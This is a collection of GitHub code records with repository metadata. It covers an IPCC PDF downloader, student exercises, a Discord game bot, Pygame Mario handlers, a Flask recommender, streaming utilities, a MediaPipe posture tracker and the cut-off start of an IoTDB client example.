url_list.append(\"https://www.ipcc.ch/reports/\" + el['href'])\n\nprint(url_list)\n\n\n# download the pdfs to a specified location\nfor url in url_list:\n print(url)\n fullfilename = os.path.join('C:\\\\Users\\\\hjbec\\\\Documents\\\\work\\\\LancetProject', url.replace(\"https://www.ipcc.ch/reports/\", \"\"))\n print(fullfilename)\n request.urlretrieve(url, fullfilename)","repo_name":"hbechara/LancetProject","sub_path":"code/getpdfs.py","file_name":"getpdfs.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"71135297081","text":"\"\"\"Ejercicio 4: Mediana de tres valores\r\nEscriba una función que tome tres números como parámetros y devuelva el valor medio de esos parámetros como resultado. \r\nIncluya un programa principal que lea tres valores del usuario y muestre su mediana.\r\nSugerencia: El valor medio es el medio de los tres valores cuando se ordenan en orden ascendente. \r\nSe puede encontrar usando declaraciones if, o con un poco de creatividad matemática.\"\"\"\r\n\r\ndef mediana(*argv):\r\n datos = list(argv)\r\n datos.sort()\r\n if len(datos)%2 != 0:\r\n mediana = datos[len(datos)//2]\r\n else:\r\n mediana = datos[len(datos)//2]+datos[(len(datos)//2)-1]\r\n mediana = mediana / 21\r\n return mediana\r\n\r\nvalor1 = int(input(\"Ingrese un valor: \"))\r\nvalor2 = int(input(\"Ingrese otro valor: \"))\r\nvalor3 = int(input(\"Ingrese otro valor: \"))\r\n\r\nprint(\"La media de los valores {},{},{} es {}\".format(valor1,valor2,valor3,mediana(valor1,valor2,valor3)))","repo_name":"enzostefani507/python-info","sub_path":"Funciones/Complementarios/Complementario4.py","file_name":"Complementario4.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1345490436","text":"def printgame(game):\n def printrow(row):\n out = \"\"\n i = 0\n while i < len(row):\n if row[i] == 0:\n out += \"\\\\| \"\n else:\n out += \"\\\\| \" * row[i] - 1 + \"\\\\|\" + '~~'\n i+= row[i] - 1\n i += 1\n return out\n out = \"\"\n for i in range(len(game)):\n out += 'abcdefghijklmno'[i] + printrow(game[i]) + '\\n'\n return out\n\nimport json\ndef run(msg, client):\n \"\"\"The way to run kreski\\n\n I don't know what kreski is but I don't care\"\"\"\n if not msg.content.startswith('k!'):\n return\n n = client.db.get('kreskigames.txt',0)\n args = msg.content.split(' ')[1:]\n switch = {}\n def case():\n msg.reply('k!start @opponent to start a game\\nk!move (gameid) (move) to move')\n return\n switch[\"help\"] = case\n def case():\n try:\n args[1]\n except IndexError:\n args[1] = 4\n starting = [[0]]\n for i in range(args[1] - 1):\n starting[i+1]=json.loads(json.dumps(starting[i]))\n starting[i].append(0)\n starting[i].append(0)\n client.db.settype('kreski',n+'.json',[msg.author.id,args[0].slice(2,-1),0,starting,starting,'11']) #If I remember correctly it's the 5th time not semi-colon was used\n n = f\"{int(n)+1}\"\n client.db.set('kreskigames.txt',n)\n msg.reply(f\"game started! id: {int(n)-1}\\n{printgame(starting)}\")\n return\n switch[\"start\"] = case\n def case():\n if len(args) < 2:\n msg.reply(\"not enough arguments\")\n return\n if len(args[1]) < 3:\n msg.reply('move is supposed to be (row)(start)(end)\\nfor example b12')\n return\n game = json.loads(client.db.gettype('kreski',args[0]+'.json'))\n if not msg.author.id == game[game[2]]:\n msg.reply('not your turn!')\n try:\n x = 'abcdefghijklmno'.find(args[1][0])\n y = int(args[1][1])\n z = int(args[1][2])\n except:\n return\n allowed = True\n for i in game[3][x][y-1, z]:\n if i != 0:\n allowed = False\n if allowed:\n game[4] = json.loads(json.dumps(game[3]))\n for i in range(y, z, 1):\n game[3][x][i] = 1\n game[3][x][y - 1] = z-y+1\n game[2] = (game[2]+1)%2\n client.db.settype('kreski',args[0]+'.json',game) #6th ?\n cont = False\n for x in game[3]:\n for y in x:\n if not y:\n cont = True\n if cont:\n msg.reply(printgame(game[3]))\n else:\n msg.reply(f\"game ends, <@{game[(game[2]+1)%2]}> wins!\")\n return\n switch[\"move\"] = case\n def case():\n if (len(args)<1):\n msg.reply('not enough arguments')\n game = json.loads(client.db.gettype('kreski',args[0]+'.json'))\n if msg.author.id != game[(game[2]+1)%2]:\n msg.reply('not your turn!')\n if game[5][game[2]] == \"0\":\n msg.reply('you can only undo once')\n game[3] = game[4]\n game[2] = (game[2]+1)%2\n game[5][game[2]] = 0\n client.db.settype('kreski',args[0]+'.json',game)\n switch[\"undo\"] = case\n del case\n switch[msg.content.split(' ')[0][2:].lower()]()\n del switch\n","repo_name":"guigui0246/kerfus-bot-but-in-python","sub_path":"features/5_games/kreski.py","file_name":"kreski.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"32742008424","text":"import sys\n\nimport pygame\nfrom pygame.locals import *\n\n\ndef on_event(mario, level, second, game_time, settings):\n \"\"\"Handles Pygame events.\"\"\"\n for event in pygame.event.get():\n if not mario.settings.level_over:\n if event.type == second:\n game_time.update()\n if event.type == KEYDOWN:\n on_key_down(event, mario, level, settings)\n elif event.type == KEYUP:\n on_key_up(event, mario)\n if event.type == QUIT:\n sys.exit()\n\n\ndef on_key_down(event, mario, level, settings):\n \"\"\"Handles key presses.\"\"\"\n if not mario.animating and not mario.hit and not settings.level_over and not mario.dead:\n if mario.pipe_down or mario.pipe_up or mario.pipe_side:\n return\n if event.key == K_RIGHT and not mario.crouching:\n mario.moving_right = True\n mario.moving_left = False\n if mario.underground:\n mario.check_pipe_exit(level)\n elif event.key == K_LEFT and not mario.crouching:\n mario.moving_left = True\n mario.moving_right = False\n elif event.key == K_DOWN:\n if not mario.pipe_down:\n mario.crouching = True\n mario.moving_left = False\n mario.moving_right = False\n mario.running = False\n mario.is_scrolling = False\n mario.check_pipe()\n elif event.key == K_s:\n if mario.moving_left or mario.moving_right:\n mario.running = True\n elif event.key == K_SPACE:\n if mario.state == \"fire\":\n mario.throw_fireball()\n elif event.key == K_UP:\n mario.jump()\n\n\ndef on_key_up(event, mario):\n \"\"\"Handles key releases.\"\"\"\n if event.key == K_RIGHT:\n mario.moving_right = False\n mario.is_scrolling = False\n if event.key == K_LEFT:\n mario.moving_left = False\n mario.is_scrolling = False\n if event.key == K_DOWN:\n mario.crouching = False\n if event.key == K_s:\n mario.running = False\n\n\ndef on_update(level, mario):\n \"\"\"Handles positions and logic.\"\"\"\n mario.update(level)\n # Freeze updates while Mario has death animation/is respawning\n if not mario.dead:\n level.update(mario, mario.is_scrolling)\n if mario.running:\n level.update(mario, mario.is_scrolling, -mario.velocity.x)\n else:\n level.update(mario, mario.is_scrolling)\n\n\ndef on_draw(level, mario, game_time, player_score):\n \"\"\"Displays all objects to screen.\"\"\"\n level.background.draw()\n # Draw Mario in front of flag pole and castle\n if mario.settings.level_over or mario.dead:\n level.draw()\n mario.draw()\n if not mario.level_2:\n level.castle_layer.draw()\n # Draw Mario behind pipes during animations\n else:\n mario.draw()\n level.draw()\n if mario.level_2:\n mario.lifes.draw(True)\n game_time.draw(True)\n player_score.draw(True)\n return\n mario.lifes.draw(mario.underground)\n game_time.draw(mario.underground)\n player_score.draw(mario.underground)\n","repo_name":"ganzabeans/Super-Mario-Pygame","sub_path":"library/game_methods.py","file_name":"game_methods.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26661666856","text":"import numpy as np\n\n# rule of sarrus for 3x3 matrix\n\ndef determinant(matrix):\n a = matrix[0][0]\n b = matrix[0][1]\n c = matrix[0][2]\n d = matrix[1][0]\n e = matrix[1][1]\n f = matrix[1][2]\n g = matrix[2][0]\n h = matrix[2][1]\n i = matrix[2][2]\n return a*e*i + b*f*g + c*d*h - c*e*g - b*d*i - a*f*h\n\nmatrix = [\n \n [2, -6, 3], \n [2, -5, 3], \n [0, 3, -1]\n\n ]\n\nprint(determinant(matrix)) # Output: 0","repo_name":"nickschnee/linear-algebra","sub_path":"det_3x3.py","file_name":"det_3x3.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37915303376","text":"from demographic_filtering import output\r\nfrom content_filtering import get_recommendations\r\nfrom storage import all_articles, liked_articles, unliked_articles\r\nfrom flask import Flask, jsonify\r\nimport itertools\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route(\"/get-article\")\r\ndef get_article():\r\n return jsonify({\r\n \"data\": all_articles[0],\r\n \"status\": \"Success\"\r\n })\r\n\r\n@app.route(\"/liked-article\", methods=[\"POST\"])\r\ndef liked_article():\r\n article = all_articles[0]\r\n liked_articles.append(article)\r\n all_articles.pop(0)\r\n\r\n return ({\r\n \"status\": \"Success\"\r\n }), 201\r\n\r\n@app.route(\"/unliked-article\", methods=[\"POST\"])\r\ndef unliked_article():\r\n article = all_articles[0]\r\n unliked_articles.append(article)\r\n all_articles.pop(0)\r\n\r\n return ({\r\n \"status\": \"Success\"\r\n }), 201\r\n\r\n@app.route(\"/popular-articles\")\r\ndef popular_articles():\r\n article_data = []\r\n for article in output:\r\n _d = {\r\n \"title\": article[0],\r\n \"lang\": article[1],\r\n \"url\": article[2],\r\n \"text\": article[3]\r\n }\r\n\r\n article_data.append(_d)\r\n\r\n return jsonify({\r\n \"data\": article_data,\r\n \"status\": \"Success\"\r\n }), 200\r\n\r\n@app.route(\"/recommended-articles\")\r\ndef recommmeded_articles():\r\n all_recommend = []\r\n\r\n for liked_article in liked_articles:\r\n output = get_recommendations(liked_article[4])\r\n for data in output:\r\n all_recommend.append(data)\r\n\r\n all_recommend.sort()\r\n all_recommend = list(all_recommend for all_recommend, _ in itertools.groupby(all_recommend))\r\n\r\n article_data = [] \r\n\r\n for recommend in all_recommend:\r\n _d = {\r\n \"title\": recommend[0],\r\n \"lang\": recommend[1],\r\n \"url\": recommend[2],\r\n \"text\": recommend[3]\r\n }\r\n\r\n article_data.append(_d)\r\n\r\n return jsonify({\r\n \"data\": article_data,\r\n \"status\": \"Success\"\r\n }), 200\r\n\r\nif __name__ == \"__main__\":\r\n app.run()","repo_name":"Shaurya0802/C142-Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20224873609","text":"import asyncio\nimport json as JSON\nimport os\nfrom .node import Node\nfrom ..base import StreamNone, StreamRepeat, StreamEnd, TributaryException\n\n\ndef Delay(node, delay=1):\n \"\"\"Streaming wrapper to delay a stream\n\n Arguments:\n node (node): input stream\n delay (float): time to delay input stream\n \"\"\"\n\n async def foo(val):\n await asyncio.sleep(delay)\n return val\n\n ret = Node(foo=foo, name=\"Delay\", inputs=1)\n node >> ret\n return ret\n\n\n# class State(Node):\n# '''Streaming wrapper to delay a stream\n\n# Arguments:\n# node (node): input stream\n# state (dict): state dictionary of values to hold\n# '''\n\n# def __init__(self, node, delay=1):\n# async def foo(val):\n# await asyncio.sleep(delay)\n# return val\n\n# super().__init__(foo=foo, foo_kwargs=None, name='Delay', inputs=1)\n# node.downstream().append((self, 0))\n# self.upstream().append(node)\n\n\ndef Apply(node, foo, foo_kwargs=None):\n \"\"\"Streaming wrapper to apply a function to an input stream\n\n Arguments:\n node (node): input stream\n foo (callable): function to apply\n foo_kwargs (dict): kwargs for function\n \"\"\"\n\n def _foo(val):\n return ret._apply(val, **ret._apply_kwargs)\n\n ret = Node(foo=_foo, name=\"Apply\", inputs=1)\n ret.set(\"_apply\", foo)\n ret.set(\"_apply_kwargs\", foo_kwargs or {})\n node >> ret\n return ret\n\n\ndef Window(node, size=-1, full_only=False):\n \"\"\"Streaming wrapper to collect a window of values\n\n Arguments:\n node (node): input stream\n size (int): size of windows to use\n full_only (bool): only return if list is full\n \"\"\"\n\n def foo(val, size=size, full_only=full_only):\n if size == 0:\n return val\n else:\n ret._accum.append(val)\n\n if size > 0:\n ret._accum = ret._accum[-size:]\n\n if full_only and len(ret._accum) == size:\n return ret._accum\n elif full_only:\n return StreamNone()\n else:\n return ret._accum\n\n ret = Node(foo=foo, name=\"Window[{}]\".format(size if size > 0 else \"∞\"), inputs=1)\n ret.set(\"_accum\", [])\n node >> ret\n return ret\n\n\ndef Unroll(node):\n \"\"\"Streaming wrapper to unroll an iterable stream. Similar to Curve\n\n Arguments:\n node (node): input stream\n \"\"\"\n\n async def foo(value):\n # unrolled\n if ret._count > 0:\n ret._count -= 1\n return value\n\n # unrolling\n try:\n for v in value:\n ret._count += 1\n await ret._push(v, 0)\n except TypeError:\n return value\n else:\n return StreamRepeat()\n\n ret = Node(foo=foo, name=\"Unroll\", inputs=1)\n ret.set(\"_count\", 0)\n node >> ret\n return ret\n\n\ndef UnrollDataFrame(node, json=False, wrap=False):\n \"\"\"Streaming wrapper to unroll a dataframe into a stream\n\n Arguments:\n node (node): input stream\n \"\"\"\n\n async def foo(value, json=json, wrap=wrap):\n # unrolled\n if ret._count > 0:\n ret._count -= 1\n return value\n\n # unrolling\n try:\n for i in range(len(value)):\n row = value.iloc[i]\n\n if json:\n data = row.to_dict()\n data[\"index\"] = row.name\n else:\n data = row\n ret._count += 1\n await ret._push(data, 0)\n\n except TypeError:\n return value\n else:\n return StreamRepeat()\n\n ret = Node(foo=foo, name=\"UnrollDF\", inputs=1)\n ret.set(\"_count\", 0)\n node >> ret\n return ret\n\n\ndef Merge(node1, node2):\n \"\"\"Streaming wrapper to merge 2 inputs into a single output\n\n Arguments:\n node1 (node): input stream\n node2 (node): input stream\n \"\"\"\n\n def foo(value1, value2):\n return value1, value2\n\n ret = Node(foo=foo, name=\"Merge\", inputs=2)\n node1 >> ret\n node2 >> ret\n return ret\n\n\ndef ListMerge(node1, node2):\n \"\"\"Streaming wrapper to merge 2 input lists into a single output list\n\n Arguments:\n node1 (node): input stream\n node2 (node): input stream\n \"\"\"\n\n def foo(value1, value2):\n return list(value1) + list(value2)\n\n ret = Node(foo=foo, name=\"ListMerge\", inputs=2)\n node1 >> ret\n node2 >> ret\n return ret\n\n\ndef DictMerge(node1, node2):\n \"\"\"Streaming wrapper to merge 2 input dicts into a single output dict.\n Preference is given to the second input (e.g. if keys overlap)\n\n Arguments:\n node1 (node): input stream\n node2 (node): input stream\n \"\"\"\n\n def foo(value1, value2):\n ret = {}\n ret.update(value1)\n ret.update(value2)\n return ret\n\n ret = Node(foo=foo, name=\"DictMerge\", inputs=2)\n node1 >> ret\n node2 >> ret\n return ret\n\n\ndef FixedMap(node, count, mapper=None):\n \"\"\"Streaming wrapper to split stream into a fixed number of outputs\n\n Arguments:\n node (Node): input stream\n count (int): number of output nodes to generate\n mapper (function): how to map the inputs into `count` streams\n \"\"\"\n rets = []\n\n def _default_mapper(value, i):\n return value[i]\n\n for _ in range(count):\n\n def foo(value, i=_, mapper=mapper or _default_mapper):\n return mapper(value, i)\n\n ret = Node(foo=foo, name=\"FixedMap\", inputs=1)\n node >> ret\n rets.append(ret)\n\n return rets\n\n\ndef Reduce(*nodes, reducer=None):\n \"\"\"Streaming wrapper to merge any number of inputs\n\n Arguments:\n nodes (tuple): input streams\n reducer (function): how to map the outputs into one stream\n \"\"\"\n\n def foo(*values, reducer=reducer):\n return values if reducer is None else reducer(*values)\n\n ret = Node(foo=foo, name=\"Reduce\", inputs=len(nodes))\n for i, n in enumerate(nodes):\n n >> ret\n return ret\n\n\ndef Subprocess(\n node, command, json=False, std_err=False, one_off=False, node_to_command=False\n):\n \"\"\"Open up a subprocess and yield the results as they come\n\n Args:\n node (Node): input stream\n command (str): command to run\n std_err (bool): include std_err\n \"\"\"\n if node_to_command and not one_off:\n raise TributaryException(\"Piping upstream values to command assumes one off\")\n\n async def _proc(value, command=command, std_err=std_err, one_off=one_off):\n if ret._proc is None:\n if node_to_command:\n command = command.format(value)\n\n proc = await asyncio.create_subprocess_shell(\n command,\n stdin=asyncio.subprocess.PIPE,\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.PIPE,\n )\n ret._proc = proc\n\n if one_off:\n stdout, stderr = await proc.communicate()\n\n if stdout:\n stdout = stdout.decode()\n if stderr:\n stderr = stderr.decode()\n\n ret._proc = None\n\n if std_err:\n return stdout, stderr\n else:\n return stdout\n\n else:\n if value == StreamEnd():\n try:\n ret._proc.terminate()\n ret._proc.kill()\n os.kill(ret._proc.pid)\n except ProcessLookupError:\n pass\n\n await ret._proc.wait()\n ret._proc = None\n\n if json:\n value = JSON.dumps(value)\n\n ret._proc.stdin.write(\"{}\\n\".format(value).encode(\"utf8\"))\n await ret._proc.stdin.drain()\n\n val = await asyncio.create_task(ret._proc.stdout.readline())\n val = val.decode().strip()\n\n if val == \"\":\n await ret._proc.wait()\n ret._proc = None\n return StreamEnd()\n\n if json:\n val = JSON.loads(val)\n return val\n\n ret = Node(foo=_proc, name=\"Proc\", inputs=1)\n ret.set(\"_proc\", None)\n node >> ret\n return ret\n\n\nNode.delay = Delay\n# Node.state = State\nNode.apply = Apply\nNode.window = Window\nNode.unroll = Unroll\nNode.unrollDataFrame = UnrollDataFrame\nNode.merge = Merge\nNode.listMerge = ListMerge\nNode.dictMerge = DictMerge\nNode.map = FixedMap\nNode.reduce = Reduce\nNode.proc = Subprocess\n","repo_name":"RajaPoseidon/tributary","sub_path":"tributary/streaming/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"7533127971","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[154]:\n\n\n# 0.a install Dependencies\n#----------------------------#\nget_ipython().system('pip install mediapipe opencv-python')\n\n\n# In[1]:\n\n\n#0.b import Dependencies\n#-----------------------------#\nimport cv2\nimport mediapipe as mp\nimport numpy as np #use for trig when calculating angles between kp's\nimport time\nmp_drawing = mp.solutions.drawing_utils #to draw poses\nmp_pose = mp.solutions.pose #imports 'pose' model from mediapipe\n\n\n# In[15]:\n\n\ncap = cv2.VideoCapture(0, cv2.CAP_DSHOW) #capture device\n\nfont = cv2.FONT_HERSHEY_DUPLEX\nred = (0,0,255)\ngreen = (0,255,0)\nblue = (243,247,0)\norange = (24,197,245)\n\ntimer = int(3)\n\n#scapula positioning variables\ncolor_scap, stage_scap, max_depression = blue, None, 0\n\n#hinge variables\ncolor_hinge, stage_hinge, eye_ear_level_angle = blue, None, 0\n\n#ASI variables\ncolor_asi, stage_asi, chin_down_nose_height = blue, None, 0\n \nwith mp_pose.Pose(min_detection_confidence=0.5, min_tracking_confidence=0.5) as pose:\n while cap.isOpened():\n ret,frame = cap.read()\n \n #mediapipe requires RGB\n image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n image.flags.writeable = False #saves memory\n \n #give results of detection\n results = pose.process(image)\n \n #Go back to BGR for cv\n image.flags.writeable = True\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n \n #Get KPs\n try:\n keypoints = results.pose_landmarks.landmark\n \n # Get coordinates for display\n r_shoulder = get_coordinates_of('r_shoulder') #relevant kp's for scapular height\n \n r_eye = get_coordinates_of('r_eye') #relevant kp's for neck hinge\n r_ear = get_coordinates_of('r_ear')\n \n nose = get_coordinates_of('nose') ##relevant kp's for atlantostyloid interval\n \n \n #RealTime Scapula Height calculation and display\n rshoulder_height = calculate_height_of(r_shoulder)\n\n cv2.putText(image, str(rshoulder_height), \n np.subtract(tuple(np.multiply(r_shoulder, [640, 480]).astype(int)),(10,10)), \n font, 0.6,(color_scap), 1, cv2.LINE_AA\n )\n \n\n \n #RealTime Horizon Level calculation and display\n r_eye_ear_angle = np.rint(calculate_angle(r_eye,r_ear,[r_ear[0],0]))\n\n cv2.putText(image, str(r_eye_ear_angle), \n np.subtract(tuple(np.multiply(r_ear, [640, 480]).astype(int)),(10,10)), \n font, 0.6,(color_hinge), 1, cv2.LINE_AA\n )\n \n #RealTime Nose Height calculation and display\n nose_height = calculate_height_of(nose)\n\n cv2.putText(image, str(nose_height), \n np.add(tuple(np.multiply(nose, [640, 480]).astype(int)),(10,10)), \n font, 0.5,(color_asi), 1, cv2.LINE_AA\n )\n \n #Header for Ideal Threshold Values:\n if max_depression != 0 or eye_ear_level_angle != 0 or chin_down_nose_height != 0:\n \n cv2.putText(image, \"Ideal Ranges\", \n (490,50), \n font, 0.65,green, 1, cv2.LINE_AA\n )\n\n\n#-------------------SCAPULA----------------------------------#\n\n capkey_scap = cv2.waitKey(10)\n if capkey_scap == ord('s'):\n prev = time.time()\n\n\n while timer >=0:\n ret,image = cap.read()\n \n cv2.putText(image, str(timer),\n (300,240), \n font,7, (255,0, 0), 4, cv2.LINE_AA)\n cv2.imshow('SPROJ Cam Feed', image)\n \n cv2.putText(image, \"Put Scapula in Maximal Depression\",\n (30,50), \n font,1, (255,0, 0), 4, cv2.LINE_AA)\n \n cv2.imshow('SPROJ Cam Feed', image) \n cv2.waitKey(1)\n \n cur = time.time()\n \n if cur-prev >=1:\n prev = cur\n timer = timer-1\n \n else:\n ret,image = cap.read()\n cv2.imshow('SPROJ Cam Feed', image)\n \n results = pose.process(image)\n keypoints = results.pose_landmarks.landmark\n r_shoulder = get_coordinates_of('r_shoulder')\n \n cv2.waitKey(1000) \n timer = int(3)\n max_depression = calculate_height_of(r_shoulder)\n \n \n\n if max_depression != 0:\n \n #Header\n cv2.putText(image,'Scapula:', \n (330,80), \n font, 0.55,color_scap, 1, cv2.LINE_AA\n )\n #Ideal Range\n cv2.putText(image,\"< \"+ str(max_depression - 5), \n (500,80), \n font, 0.55,color_scap, 1, cv2.LINE_AA\n )\n \n #scapular threshold ranges\n if rshoulder_height > max_depression - 5:\n stage_scap = \"Too Low\"\n color_scap = red\n else:\n stage_scap = \"Adequate Height\"\n color_scap = green\n else:\n stage_scap = \"Not Yet Calibrated\"\n color_scap = blue\n \n \n #Scapular threshold displays\n \n #Header\n cv2.putText(image, \"Scapular Height Status:\", \n (10,370), \n font, 0.7,(color_scap), 1, cv2.LINE_AA\n )\n #Status\n cv2.putText(image,stage_scap, \n (330,370), \n font, 0.7,(color_scap), 1, cv2.LINE_AA\n )\n \n \n#-----------------END--SCAPULA--------------------------------------#\n#-----------------CERVICAL HINGE------------------------------------#\n\n \n capkey = cv2.waitKey(10)\n if capkey == ord('n'):\n prev = time.time()\n \n while timer >=0:\n ret,image = cap.read()\n \n cv2.putText(image, \"Lift Back of Head Towards Ceiling\",\n (30,50), \n font,1, (255,0, 0), 4, cv2.LINE_AA)\n \n cv2.putText(image, str(timer),\n (320,240), \n font,7, (255,0, 0), 4, cv2.LINE_AA)\n cv2.imshow('SPROJ Cam Feed', image)\n cv2.waitKey(1)\n \n cur = time.time()\n \n if cur-prev >=1:\n prev = cur\n timer = timer-1\n \n else:\n ret,image = cap.read()\n cv2.imshow('SPROJ Cam Feed', image)\n \n results = pose.process(image)\n keypoints = results.pose_landmarks.landmark\n r_eye = get_coordinates_of('r_eye')\n r_ear = get_coordinates_of('r_ear')\n nose = get_coordinates_of('nose')\n \n cv2.waitKey(1000) \n timer = int(3)\n eye_ear_level_angle = np.rint(calculate_angle(r_eye,r_ear,[r_ear[0],0]))\n chin_down_nose_height = calculate_height_of(nose)\n \n \n \n \n #hinge threshold ranges\n\n if eye_ear_level_angle != 0:\n \n #Header\n cv2.putText(image,'Eye-Ear Level:', \n (330,110), \n font, 0.55,color_hinge, 1, cv2.LINE_AA\n )\n #Ideal Range\n cv2.putText(image,str(eye_ear_level_angle - 12) + ' - ' + str(eye_ear_level_angle + 8), \n (500,110), \n font, 0.55,color_hinge, 1, cv2.LINE_AA\n )\n \n if eye_ear_level_angle > 110 or eye_ear_level_angle < 70:\n stage_hinge = \"Bad Calibration, Try Again\"\n color_hinge = blue\n \n elif r_eye_ear_angle > eye_ear_level_angle + 8:\n stage_hinge = \"Overly Tucking Chin\"\n color_hinge = red\n #hinging is granted 4 degrees of freedom because a slight change is inevitable when \n #raising chin to increase ASI\n elif r_eye_ear_angle < eye_ear_level_angle - 12:\n stage_hinge = \"Hinging\"\n color_hinge = red\n \n elif stage_asi == \"May Be Slightly Hinging\" and stage_hinge != \"Hinging\":\n stage_hinge = stage_asi\n color_hinge = orange\n \n elif (r_eye_ear_angle <= eye_ear_level_angle + 8) and (r_eye_ear_angle >= eye_ear_level_angle - 12):\n stage_hinge = \"Adequate Position\"\n color_hinge = green\n \n else:\n stage_hinge = \"Not Yet Calibrated\"\n color_hinge = blue\n \n\n \n # Hinge threshold display\n cv2.putText(image,\"Cervical Hinge Status:\", \n (10,400), \n font, 0.7,(color_hinge), 1, cv2.LINE_AA\n )\n\n cv2.putText(image,stage_hinge, \n (330,400), \n font, 0.7,(color_hinge), 1, cv2.LINE_AA\n )\n \n \n \n\n#-----------------END CERVICAL HINGE---------------#\n\n#--------------- ATLANTOSTYLOID INTERVAL------------#\n \n#ASI is measured through the height of the nose keypoint AFTER properly eliminating hinge;they are closely related\n#Therefore, ASI does not need it's own calibration.\n\n\n\n\n #ASI threshold ranges\n if chin_down_nose_height != 0:\n \n #Header\n cv2.putText(image,'Nose Height:', \n (330,140), \n font, 0.55,(color_asi), 1, cv2.LINE_AA\n )\n #Ideal Range\n cv2.putText(image,str(chin_down_nose_height - 12) + \" - \"+ str(chin_down_nose_height - 5), \n (500,140), \n font, 0.55,(color_asi), 1, cv2.LINE_AA\n )\n \n \n if stage_hinge == \"Bad Calibration, Try Again\":\n chin_down_nose_height = 0\n \n \n elif stage_hinge == \"Hinging\":\n stage_asi = stage_hinge\n color_asi = red\n \n elif stage_hinge == \"Overly Tucking Chin\":\n stage_asi = stage_hinge\n color_asi = red\n \n \n elif nose_height >= chin_down_nose_height and stage_hinge != \"Overly Tucking Chin\":\n stage_asi = \"Gently Raise Chin\"\n color_asi = orange\n \n #10 pixels of freedom for adequate interval or until hinge occurs\n elif nose_height < chin_down_nose_height - 15 and stage_hinge != \"Hinging\":\n stage_asi = \"May Be Slightly Hinging\"\n color_asi = orange\n \n elif (nose_height <= chin_down_nose_height - 5) and (nose_height >= chin_down_nose_height - 15):\n stage_asi = \"Adequate Interval\"\n color_asi = green\n \n else:\n stage_asi = \"Not Yet Calibrated\"\n color_asi = blue\n \n \n #ASI threshold display\n cv2.putText(image, \"ASI Status:\", \n (10,430), \n font, 0.7,(color_asi), 1, cv2.LINE_AA\n ) \n\n cv2.putText(image, stage_asi, \n (330,430), \n font, 0.7,(color_asi), 1, cv2.LINE_AA\n )\n \n except:\n pass\n \n \n #Render detections - pass image, kp's, and limbs between kp's\n mp_drawing.draw_landmarks(image, results.pose_landmarks, mp_pose.POSE_CONNECTIONS)\n \n cv2.imshow('SPROJ Cam Feed', image)\n \n #Exit Program\n exitkey = cv2.waitKey(10) & 0xFF\n if exitkey == ord('q'):\n break\n \n cap.release()\n cv2.destroyAllWindows()\n\n\n# In[3]:\n\n\ndef calculate_angle(a,b,c):\n a = np.array(a)\n b = np.array(b)\n c = np.array(c)\n \n radians = np.arctan2(c[1]-b[1], c[0]-b[0]) - np.arctan2(a[1]-b[1], a[0]-b[0])\n angle = np.abs(radians*180.0/np.pi)\n \n return angle\n\n\n# In[4]:\n\n\ndef calculate_height_of(a):\n ycoord = a[1]\n height = np.rint(ycoord*480)\n return height\n\n\n# In[5]:\n\n\nkeypoint_IDs = {\n 'nose':0,\n 'r_eye':3,\n 'r_ear':8,\n 'r_shoulder':12\n}\n\n\n# In[6]:\n\n\ndef get_coordinates_of(keypoint: str):\n return[keypoints[keypoint_IDs[keypoint]].x,keypoints[keypoint_IDs[keypoint]].y]\n\n\n# In[155]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"marco-scanni/SPROJ-Code","sub_path":"SP-Scanni-FullCode.py","file_name":"SP-Scanni-FullCode.py","file_ext":"py","file_size_in_byte":14155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10970068489","text":"from setuptools import setup\nimport re\n\n__version__ = re.findall(r\"\"\"__version__ = [\"']+([0-9\\.]*)[\"']+\"\"\", open(\"RRAlinter/__init__.py\").read())[0]\n\nsetup(\n name=\"RRA-linter\",\n version=__version__,\n description=\"RRA-linter is a linter for manuscripts .tex files used to identify common issues in writing.\",\n keywords=\"latex\",\n author=\"\",\n author_email=\"\",\n url=\"https://github.com/mdolab/r\",\n # license=\"Apache 2.0\",\n packages=[\"RRAlinter\"],\n # package_data={\"cgnsutilities\": [\"*.so\"]},\n # install_requires=[\"numpy>=1.16\"],\n # classifiers=[\"Operating System :: Linux\", \"Programming Language :: Python, Fortran\"],\n entry_points={\"console_scripts\": [\"RRAlint = RRAlinter.linter:main\"]},\n)\n","repo_name":"joanibal/RRAlinter","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4339081144","text":"import numpy as np\n\nfrom iotdb.Session import Session\nfrom iotdb.template.MeasurementNode import MeasurementNode\nfrom iotdb.template.Template import Template\nfrom iotdb.utils.BitMap import BitMap\nfrom iotdb.utils.IoTDBConstants import TSDataType, TSEncoding, Compressor\nfrom iotdb.utils.Tablet import Tablet\nfrom iotdb.utils.NumpyTablet import NumpyTablet\n\n# creating session connection.\nip = \"127.0.0.1\"\nport_ = \"6667\"\nusername_ = \"root\"\npassword_ = \"root\"\n# session = Session(ip, port_, username_, password_, fetch_size=1024, zone_id=\"UTC+8\", enable_redirection=True)\nsession = Session.init_from_node_urls(\n node_urls=[\"127.0.0.1:6667\", \"127.0.0.1:6668\", \"127.0.0.1:6669\"],\n 